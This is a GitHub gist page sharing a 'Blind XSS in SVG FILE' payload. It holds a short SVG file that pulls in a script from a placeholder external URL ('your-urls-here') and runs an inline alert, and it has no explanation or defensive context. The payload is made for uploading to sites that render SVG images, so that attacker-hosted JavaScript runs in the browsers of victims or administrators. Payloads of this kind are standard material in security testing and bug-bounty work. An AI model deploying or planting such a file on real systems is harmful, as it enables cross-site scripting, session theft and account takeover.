Skip to content

Instantly share code, notes, and snippets.

@SaFiSec

SaFiSec/Blind XSS in SVG FILE

Forked from ioribrn/Blind XSS in SVG FILE
Created May 31, 2023 19:41
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save SaFiSec/af572e2a374d0b0e8feb8245327096ee to your computer and use it in GitHub Desktop.
Save SaFiSec/af572e2a374d0b0e8feb8245327096ee to your computer and use it in GitHub Desktop.
Download ZIP
Raw
Blind XSS in SVG FILE
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC
"-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="200"
height="200"
zoomAndPan="disable"
xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink"
xml:space="preserve">
<!-- Script linked from the outside-->
<script xlink:href="https://your-urls-here" />
<script>
//<![CDATA[
alert("ble");
]]>
</script>
</svg>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment